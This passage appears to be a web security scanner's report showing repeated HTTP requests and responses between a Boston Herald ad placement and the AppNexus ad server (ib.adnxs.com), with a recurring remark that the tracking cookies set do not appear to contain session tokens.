GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-51832465_1296253632%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.weath_l-cm.ent_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D302941%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.rdst7%3Bbtg%3Dcm.rdst8%3Bbtg%3Dcm.polit_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.ent_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.9211412204895169%3F HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sess=1; icu=EAAYAA..; acb502322=5_[r^208WMuF4Lw)IE.8#`^VR?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP6BgySx3_8JEBWHfHSmrEELJQUNNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEnQMBAgUCAAIAAAAAZSKqQQAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296253385%29%3Buf%28%27r%27%2C+151403%2C+1296253385%29%3Bppv%2882%2C+%274954803427378552992%27%2C+1296253385%2C+1306621385%2C+2132%2C+24319%29%3Bppv%2884%2C+%274954803427378552992%27%2C+1296253385%2C+1306621385%2C+2132%2C+24319%29%3Bppv%2811%2C+%274954803427378552992%27%2C+1296253385%2C+1306621385%2C+2132%2C+24319%29%3Bppv%2882%2C+%274954803427378552992%27%2C+1296253385%2C+1306621385%2C+2132%2C+24319%29%3Bppv%2884%2C+%274954803427378552992%27%2C+1296253385%2C+1306621385%2C+2132%2C+24319%29%3Bppv%2887%2C+%274954803427378552992%27%2C+1296253385%2C+1296339785%2C+2132%2C+24319%29%3Bppv%28619%2C+%274954803427378552992%27%2C+1296253385%2C+1296339785%2C+2132%2C+24319%29%3Bppv%28620%2C+%274954803427378552992%27%2C+1296253385%2C+1296339785%2C+2132%2C+24319%29%3Bppv%28621%2C+%274954803427378552992%27%2C+1296253385%2C+1296339785%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 22:27:12 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:27:12 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb502322=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 22:27:12 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb510504=5_[r^208WMuF4Lw)IE.8w)IgJ?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPwQ_cisQ0NJ6BWHfHSmrEELAQkNNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQENgYBAgUCAAIAAAAAlCBOvgAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296253632%29%3Buf%28%27r%27%2C+151403%2C+1296253632%29%3Bppv%2882%2C+%278850364985603407620%27%2C+1296253632%2C+1306621632%2C+2132%2C+24319%29%3Bppv%2884%2C+%278850364985603407620%27%2C+1296253632%2C+1306621632%2C+2132%2C+24319%29%3Bppv%2811%2C+%278850364985603407620%27%2C+1296253632%2C+1306621632%2C+2132%2C+24319%29%3Bppv%2882%2C+%278850364985603407620%27%2C+1296253632%2C+1306621632%2C+2132%2C+24319%29%3Bppv%2884%2C+%278850364985603407620%27%2C+1296253632%2C+1306621632%2C+2132%2C+24319%29%3Bppv%2887%2C+%278850364985603407620%27%2C+1296253632%2C+1296340032%2C+2132%2C+24319%29%3Bppv%28619%2C+%278850364985603407620%27%2C+1296253632%2C+1296340032%2C+2132%2C+24319%29%3Bppv%28620%2C+%278850364985603407620%27%2C+1296253632%2C+1296340032%2C+2132%2C+24319%29%3Bppv%28621%2C+%278850364985603407620%27%2C+1296253632%2C+1296340032%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 22:27:12 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:27:12 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 22:27:12 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Fri, 28 Jan 2011 22:27:12 GMT Content-Length: 834
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-83450342_1296254125%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.weath_l-cm.ent_m-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D782666%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.rdst7%3Bbtg%3Dcm.rdst8%3Bbtg%3Dcm.polit_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.ent_m%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.1877197385765612%3F HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sess=1; icu=EAAYAA..; acb510504=5_[r^208WMuF4Lw)IE.8w)IgJ?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPwQ_cisQ0NJ6BWHfHSmrEELAQkNNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQENgYBAgUCAAIAAAAAlCBOvgAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296253632%29%3Buf%28%27r%27%2C+151403%2C+1296253632%29%3Bppv%2882%2C+%278850364985603407620%27%2C+1296253632%2C+1306621632%2C+2132%2C+24319%29%3Bppv%2884%2C+%278850364985603407620%27%2C+1296253632%2C+1306621632%2C+2132%2C+24319%29%3Bppv%2811%2C+%278850364985603407620%27%2C+1296253632%2C+1306621632%2C+2132%2C+24319%29%3Bppv%2882%2C+%278850364985603407620%27%2C+1296253632%2C+1306621632%2C+2132%2C+24319%29%3Bppv%2884%2C+%278850364985603407620%27%2C+1296253632%2C+1306621632%2C+2132%2C+24319%29%3Bppv%2887%2C+%278850364985603407620%27%2C+1296253632%2C+1296340032%2C+2132%2C+24319%29%3Bppv%28619%2C+%278850364985603407620%27%2C+1296253632%2C+1296340032%2C+2132%2C+24319%29%3Bppv%28620%2C+%278850364985603407620%27%2C+1296253632%2C+1296340032%2C+2132%2C+24319%29%3Bppv%28621%2C+%278850364985603407620%27%2C+1296253632%2C+1296340032%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sun, 30-Jan-2011 01:42:45 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:45 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb510504=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:42:45 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb307194=5_[r^208WMM2x@N!@@-#i?ZLM?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQFAPN9PjZduwj97FK5H4XrEP-_d-QzLH-9yBWHfHSmrEEKVcENNAAAAACQ9AwA3AQAAsQAAAAIAAAB4xgEA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEpQQBAgUCAAIAAAAALyTsvgAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+379%2C+1296265365%29%3Buf%28%27r%27%2C+116344%2C+1296265365%29%3B&cnd=!-xaQmAic0QEQ-IwHGAAg_70BKNQJMXsUrkfhesQ_QhMIABAAGAAgASj-__________8BSABQAFiqA2AAaLEB; path=/; expires=Sun, 30-Jan-2011 01:42:45 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:45 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Fri, 29-Apr-2011 01:42:45 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Sat, 29 Jan 2011 01:42:45 GMT Content-Length: 833
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-51832465_1296253632%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.weath_l-cm.ent_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D302941%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.rdst7%3Bbtg%3Dcm.rdst8%3Bbtg%3Dcm.polit_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.ent_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.9211412204895169%3F HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sess=1; icu=EAAYAA..; acb502322=5_[r^208WMuF4Lw)IE.8#`^VR?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP6BgySx3_8JEBWHfHSmrEELJQUNNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEnQMBAgUCAAIAAAAAZSKqQQAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296253385%29%3Buf%28%27r%27%2C+151403%2C+1296253385%29%3Bppv%2882%2C+%274954803427378552992%27%2C+1296253385%2C+1306621385%2C+2132%2C+24319%29%3Bppv%2884%2C+%274954803427378552992%27%2C+1296253385%2C+1306621385%2C+2132%2C+24319%29%3Bppv%2811%2C+%274954803427378552992%27%2C+1296253385%2C+1306621385%2C+2132%2C+24319%29%3Bppv%2882%2C+%274954803427378552992%27%2C+1296253385%2C+1306621385%2C+2132%2C+24319%29%3Bppv%2884%2C+%274954803427378552992%27%2C+1296253385%2C+1306621385%2C+2132%2C+24319%29%3Bppv%2887%2C+%274954803427378552992%27%2C+1296253385%2C+1296339785%2C+2132%2C+24319%29%3Bppv%28619%2C+%274954803427378552992%27%2C+1296253385%2C+1296339785%2C+2132%2C+24319%29%3Bppv%28620%2C+%274954803427378552992%27%2C+1296253385%2C+1296339785%2C+2132%2C+24319%29%3Bppv%28621%2C+%274954803427378552992%27%2C+1296253385%2C+1296339785%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sun, 30-Jan-2011 01:42:29 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:29 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb502322=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:42:29 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb309158=5_[r^208WMM2x@N!@@-#d2Qg=?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQFAPN9PjZduwj97FK5H4XrEP6x8iUTubwtkBWHfHSmrEEKFcENNAAAAACQ9AwA3AQAAsQAAAAIAAAB4xgEA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEkgQBAgUCAAIAAAAAsSLfRQAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+379%2C+1296265349%29%3Buf%28%27r%27%2C+116344%2C+1296265349%29%3B&cnd=!-xaQmAic0QEQ-IwHGAAg_70BKNQJMXsUrkfhesQ_QhMIABAAGAAgASj-__________8BSABQAFiqA2AAaLEB; path=/; expires=Sun, 30-Jan-2011 01:42:29 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:29 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Fri, 29-Apr-2011 01:42:29 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Sat, 29 Jan 2011 01:42:29 GMT Content-Length: 833
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-84139438_1296253138%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.weath_l-cm.ent_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D47567%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.rdst7%3Bbtg%3Dcm.rdst8%3Bbtg%3Dcm.polit_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.ent_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.7543001882731915%3F HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sess=1; icu=EAAYAA..; acb458625=5_[r^208WMuF4Lw)IE.8*M4Bc?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP8BW6sqWS4UpBWHfHSmrEELbP0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEkgQBAgUCAAIAAAAAUyJEQAAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296252891%29%3Buf%28%27r%27%2C+151403%2C+1296252891%29%3Bppv%2882%2C+%272991880638479095488%27%2C+1296252891%2C+1306620891%2C+2132%2C+24319%29%3Bppv%2884%2C+%272991880638479095488%27%2C+1296252891%2C+1306620891%2C+2132%2C+24319%29%3Bppv%2811%2C+%272991880638479095488%27%2C+1296252891%2C+1306620891%2C+2132%2C+24319%29%3Bppv%2882%2C+%272991880638479095488%27%2C+1296252891%2C+1306620891%2C+2132%2C+24319%29%3Bppv%2884%2C+%272991880638479095488%27%2C+1296252891%2C+1306620891%2C+2132%2C+24319%29%3Bppv%2887%2C+%272991880638479095488%27%2C+1296252891%2C+1296339291%2C+2132%2C+24319%29%3Bppv%28619%2C+%272991880638479095488%27%2C+1296252891%2C+1296339291%2C+2132%2C+24319%29%3Bppv%28620%2C+%272991880638479095488%27%2C+1296252891%2C+1296339291%2C+2132%2C+24319%29%3Bppv%28621%2C+%272991880638479095488%27%2C+1296252891%2C+1296339291%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 22:18:58 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:18:58 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb458625=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 22:18:58 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: 